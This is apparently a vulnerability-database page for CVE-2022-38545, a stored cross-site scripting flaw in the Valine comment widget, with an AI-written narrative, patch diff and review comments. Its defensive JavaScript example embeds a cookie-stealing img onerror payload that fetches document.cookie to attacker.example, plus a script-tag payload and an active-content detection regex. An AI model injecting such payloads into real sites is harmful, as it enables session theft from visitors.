VYPR
Critical severity · NVD Advisory · Published Sep 19, 2022 · Updated Aug 3, 2024

CVE-2022-38545


Description

Valine v1.4.18 is vulnerable to remote code execution via crafted POST requests due to insufficient input validation.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Valine v1.4.18, a comment system based on Leancloud, contains a vulnerability that the advisory classifies as remote code execution (RCE). The root cause is insufficient sanitization of user-supplied comment data submitted via POST requests, which is later rendered without adequate filtering, so arbitrary code can be injected into it [1][2][4].

Attackers exploit this by sending a specially crafted POST request to the comment submission endpoint used by a Valine instance. No authentication is required: anyone who can reach the endpoint can post a comment. Because the submission is a plain HTTP request, any validation performed by the widget's own JavaScript is bypassed entirely, so whatever the request carries is what gets stored. The vulnerable fields are comment metadata such as the user-agent (UA) string, which Valine renders alongside each comment and which a crafted request can set to arbitrary markup and script [3].

Successful exploitation allows an attacker to execute arbitrary code in the context of the site that embeds Valine [4]. Note what the page's own evidence supports: package.json describes Valine as a comment system based on Leancloud with no server component of its own, and the fix commit, titled "fixed xss and more", adds the DOMPurify HTML sanitizer as a dependency. The code that runs is therefore script in the browser of every visitor who loads the poisoned comment (stored cross-site scripting), executing in the embedding site's origin with access to its cookies, storage and DOM. That is a serious impact, and it chains into session theft, account takeover or content tampering on the host site, but it is not operating-system command execution on a server, and the "full server compromise" wording should be read with that in mind.

A fix has been implemented in commit c40826c5816c98d797a6b1ed8b62bddf73ed4f65 on GitHub [2] and released as Valine 1.5.0; the commit adds DOMPurify as a dependency and ships rebuilt dist/Valine.min.js and dist/Valine.Pure.min.js. Users are strongly advised to update to 1.5.0 or later; sites that load the dist bundle directly rather than through npm must make sure the build they serve is at or after this commit. No workarounds are documented; updating is the recommended remediation [1][4].
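As an added example (not Valine's code and not from the advisory or its references), the following JavaScript shows the render-side mistake the narrative describes and the shape of the fix. It constructs a comment record the way a crafted POST could leave it in the comment store, with markup in the UA field and in the body, then renders it once by splicing the stored fields straight into HTML (the vulnerable pattern) and once by escaping every plain-text field and passing only the body through an allowlist sanitizer. The field names nick, ua and comment, the CSS class names, the attacker URL and the small escape-then-reallow sanitizer are all assumptions made for this example; the sanitizer only stands in for DOMPurify, which is what the fix commit adds.

```javascript
// Added example, not Valine's code. Field names, class names, the attacker
// URL and the mini sanitizer are assumptions made for illustration.

// Entity-escape a string so it renders as text, never as markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Minimal allowlist sanitizer standing in for DOMPurify: escape everything,
// then re-enable a few attribute-free inline tags by exact string match.
// The re-enabled strings carry no attributes, so no on*= handler survives.
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'code'];
function sanitizeHtml(html) {
  let out = escapeHtml(html);
  for (const t of ALLOWED_TAGS) {
    out = out.split(`&lt;${t}&gt;`).join(`<${t}>`)
             .split(`&lt;/${t}&gt;`).join(`</${t}>`);
  }
  return out;
}

// Constructed sample: a record as a crafted POST straight to the comment
// store could leave it. The widget's own submit path never ran, so nothing
// upstream of the renderer can be trusted to have cleaned these fields.
const storedComment = {
  nick: 'guest',
  ua: `Mozilla/5.0 <img src=x onerror="fetch('https://attacker.example/?c=' + document.cookie)">`,
  comment: '<b>nice post</b><script>alert(1)</script>',
};

// Vulnerable pattern: trust stored fields and splice them into the DOM string.
function renderVulnerable(c) {
  return `<div class="vcomment">` +
         `<span class="vnick">${c.nick}</span>` +
         `<span class="vua">${c.ua}</span>` +
         `<p>${c.comment}</p></div>`;
}

// Hardened pattern: every field is untrusted at render time. Plain-text
// fields (nick, UA) are escaped outright; only the body gets an allowlist.
function renderHardened(c) {
  return `<div class="vcomment">` +
         `<span class="vnick">${escapeHtml(c.nick)}</span>` +
         `<span class="vua">${escapeHtml(c.ua)}</span>` +
         `<p>${sanitizeHtml(c.comment)}</p></div>`;
}

// Heuristic used to compare the two outputs: a real <script> tag, or a real
// tag carrying an on*= event-handler attribute, counts as active content.
function hasActiveContent(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Stand-alone run: report which renderer leaves active content in the markup.
console.log('vulnerable renderer leaves active content:',
  hasActiveContent(renderVulnerable(storedComment)));
console.log('hardened renderer leaves active content:',
  hasActiveContent(renderHardened(storedComment)));
```

Run it with node. The design point is where the defence lives: because the sample record never passed through the widget's submit code, the only place that reliably sees every comment is the renderer, so escaping and sanitization have to happen there, over every field that reaches the DOM (the UA string included), which is exactly where a DOMPurify call belongs.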

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package   Ecosystem   Affected versions   Patched versions
valine    npm         < 1.5.0             1.5.0

Affected products (2)

Patches (1)
c40826c5816c

fixed xss and more #400

https://github.com/xCss/Valine · Hero · Jun 24, 2022 · via ghsa
4 files changed · +46 −68
  • dist/Valine.min.js  +5 −5  modified
  • dist/Valine.Pure.min.js  +5 −5  modified
  • docs/index.html  +34 −57  modified
    @@ -1,82 +1,59 @@
    -
    -
    -
    -
     <!DOCTYPE html>
     <html lang="zh" class="no-js">
       <head>
    +    <meta charset="utf-8">
    +    <meta name="viewport" content="width=device-width,initial-scale=1">
    +    <meta http-equiv="x-ua-compatible" content="ie=edge">
    +    <meta name="keywords" content="极简风评论系统,社会化评论系统,无后端评论系统,评论系统,comment system,valine comment system,simple &amp; fast,Minimalist style">
         
    -      <meta charset="utf-8">
    -      <meta name="viewport" content="width=device-width,initial-scale=1">
    -      <meta http-equiv="x-ua-compatible" content="ie=edge">
    -	  <meta name="keywords" content="极简风评论系统,社会化评论系统,无后端评论系统,评论系统,comment system,valine comment system,simple &amp; fast,Minimalist style">
    -      
    -        <meta name="description" content="A fast, simple & powerful comment system.">
    -      
    -      
    -        <link rel="canonical" href="https://valine.js.org/">
    -      
    -      
    -        <meta name="author" content="xCss">
    -      
    -      
    -        <meta name="lang:clipboard.copy" content="复制">
    -      
    -        <meta name="lang:clipboard.copied" content="已复制">
    -      
    -        <meta name="lang:search.language" content="jp">
    -      
    -        <meta name="lang:search.pipeline.stopwords" content="True">
    -      
    -        <meta name="lang:search.pipeline.trimmer" content="True">
    -      
    -        <meta name="lang:search.result.none" content="没有找到符合条件的结果">
    -      
    -        <meta name="lang:search.result.one" content="找到 1 个符合条件的结果">
    -      
    -        <meta name="lang:search.result.other" content="# 个符合条件的结果">
    -      
    -        <meta name="lang:search.tokenizer" content="[\uff0c\u3002]+">
    -      
    -      <link rel="shortcut icon" href="./assets/images/favicon.ico">
    -      <meta name="generator" content="mkdocs-0.17.3, mkdocs-material-2.7.1">
    +      <meta name="description" content="A fast, simple & powerful comment system.">
         
         
    -      
    -        <title>Valine - A fast, simple & powerful comment system.</title>
    -      
    +      <link rel="canonical" href="https://valine.js.org/">
         
         
    -      <link rel="stylesheet" href="./assets/stylesheets/application.78aab2dc.css">
    -      
    -        <link rel="stylesheet" href="./assets/stylesheets/application-palette.6079476c.css">
    -      
    +      <meta name="author" content="xCss">
         
         
    -      <script src="./assets/javascripts/modernizr.1aa3b519.js"></script>
    +      <meta name="lang:clipboard.copy" content="复制">
    +    
    +      <meta name="lang:clipboard.copied" content="已复制">
    +    
    +      <meta name="lang:search.language" content="jp">
         
    +      <meta name="lang:search.pipeline.stopwords" content="True">
         
    +      <meta name="lang:search.pipeline.trimmer" content="True">
    +    
    +      <meta name="lang:search.result.none" content="没有找到符合条件的结果">
    +    
    +      <meta name="lang:search.result.one" content="找到 1 个符合条件的结果">
    +    
    +      <meta name="lang:search.result.other" content="# 个符合条件的结果">
    +    
    +      <meta name="lang:search.tokenizer" content="[\uff0c\u3002]+">
    +      
    +      <link rel="shortcut icon" href="./assets/images/favicon.ico">
    +      <meta name="generator" content="mkdocs-0.17.3, mkdocs-material-2.7.1">
    +      <title>Valine - A fast, simple & powerful comment system.</title>
    +      
    +      <link rel="stylesheet" href="./assets/stylesheets/application.78aab2dc.css">
    +      
    +      <link rel="stylesheet" href="./assets/stylesheets/application-palette.6079476c.css">
    +      <script src="./assets/javascripts/modernizr.1aa3b519.js"></script>
           <link href="https://fonts-gstatic.proxy.ustclug.org" rel="preconnect" crossorigin>
           
    -        <link rel="stylesheet" href="https://fonts.proxy.ustclug.org/css?family=Ubuntu:300,400,400i,700|Ubuntu+Mono">
    -        <style>body,input{font-family:"Ubuntu","Helvetica Neue",Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Ubuntu Mono","Courier New",Courier,monospace}</style>
    +      <link rel="stylesheet" href="https://fonts.proxy.ustclug.org/css?family=Ubuntu:300,400,400i,700|Ubuntu+Mono">
    +      <style>body,input{font-family:"Ubuntu","Helvetica Neue",Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Ubuntu Mono","Courier New",Courier,monospace}</style>
           
           <link rel="stylesheet" href="https://fonts.proxy.ustclug.org/icon?family=Material+Icons">
         
    -    
    -    
       </head>
    -  
    -    
         
         <body dir="ltr" data-md-color-primary="white" data-md-color-accent="">
    -  
         <svg class="md-svg">
           <defs>
    -        
    -        
    -          <svg xmlns="http://www.w3.org/2000/svg" width="416" height="448"
    -    viewBox="0 0 416 448" id="github">
    +          <svg xmlns="http://www.w3.org/2000/svg" width="416" height="448" viewBox="0 0 416 448" id="github">
       <path fill="currentColor" d="M160 304q0 10-3.125 20.5t-10.75 19-18.125
             8.5-18.125-8.5-10.75-19-3.125-20.5 3.125-20.5 10.75-19 18.125-8.5
             18.125 8.5 10.75 19 3.125 20.5zM320 304q0 10-3.125 20.5t-10.75
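Review bot: the docs/index.html hunk contains only indentation and ordering changes to the page head (meta tags, stylesheet links, the inline GitHub SVG) and no functional change, while the files that carry the actual fix, dist/Valine.min.js and dist/Valine.Pure.min.js, are minified build output whose diff is not reviewable here; the commit touches no unminified source file, so please include the source change that introduces the sanitizer call (or point to the commit that does) so the sanitization boundary can be reviewed, and keep documentation reflow in a separate commit from a security fix.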
    
  • package.json  +2 −1  modified
    @@ -1,6 +1,6 @@
     {
       "name": "valine",
    -  "version": "1.4.18",
    +  "version": "1.5.0",
       "description": "A simple comment system based on Leancloud.",
       "main": "dist/Valine.min.js",
       "author": "xCss <xioveliu@gmail.com> (https://github.com/xCss)",
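Review bot: the bump from 1.4.18 to 1.5.0 is a minor-version increase for a security fix, which is what lets the advisory express the affected range as < 1.5.0, but nothing in the diff records the reason (no changelog or release-notes entry is among the 4 files changed), so add a changelog line naming the XSS fix so that downstream users comparing versions can see why 1.5.0 is the floor.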
    @@ -49,6 +49,7 @@
         "balajs": "^1.0.7",
         "balalaika": "^1.0.1",
         "blueimp-md5": "^2.8.0",
    +    "dompurify": "^2.3.8",
         "element-closest": "^3.0.2",
         "hanabi": "^0.4.0",
         "insane": "^2.6.2",
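Review bot: adding "dompurify": "^2.3.8" is the right direction (a maintained allowlist sanitizer rather than hand-written filtering), but the existing "insane": "^2.6.2" sanitizer stays in the dependency list, so either state that both are still needed or remove the unused one, since two sanitizers with different allowlists invite inconsistent handling; and because the package describes itself as a comment system based on Leancloud, comments can reach the store without passing through this bundle at all, so the DOMPurify call must run at render time over every field that ends up in the DOM, including the UA string the advisory mentions, and that call is only visible in the minified dist, so its placement cannot be confirmed from this diff.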
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (5)

News mentions (0)

No linked articles in our index yet.